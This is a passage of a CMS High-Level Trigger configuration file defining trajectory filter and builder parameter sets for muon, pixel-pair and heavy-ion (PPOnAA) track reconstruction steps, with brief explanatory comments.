maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2IterL3FromL1MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2HighPtTkMuESPMeasurementTracker" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( False ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2IterL3FromL1MuonPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter2IterL3MuonPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 3 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2IterL3MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2HighPtTkMuESPMeasurementTracker" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( False ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2IterL3MuonPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetCkfTrajectoryFilterIterL3OI = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 3.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 10.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
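# Pixel-pair step: the default and inOut passes use separate filters
# (HLTPSetPixelPairStepTrajectoryFilter / HLTPSetPixelPairStepTrajectoryFilterInOut);
# the builder further down sets useSameTrajFilter = False so each pass gets its own filter.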
HLTPSetPixelPairStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterInOut = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 1 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterInOut" ) ),
useSameTrajFilter = cms.bool( False ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
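# The "PPOnAA" PSets that follow are the trajectory filter/builder variants for the
# heavy-ion (PbPb / pp reference) tracking iterations; they mirror the pp configuration
# with per-step thresholds tuned for that menu (assumption based on the PPOnAA naming).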
HLTPSetTobTecStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepInOutTrajectoryFilterPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.49 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedQuadStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetCkfBaseTrajectoryFilter_block = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepInOutTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryFilterBasePreSplittingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.2 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderPreSplittingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPreSplittingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.49 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 50 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.4 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
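# CompositeTrajectoryFilter: combines the base hit/pT filter with the strip subcluster
# shape filter (both referenced by name); a candidate is kept only if it passes every
# filter listed in "filters".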
HLTPSetInitialStepTrajectoryFilterPreSplittingPPOnAA = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterBasePreSplittingPPOnAA" ) ),
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA" ) )
)
)
HLTPSetMixedTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
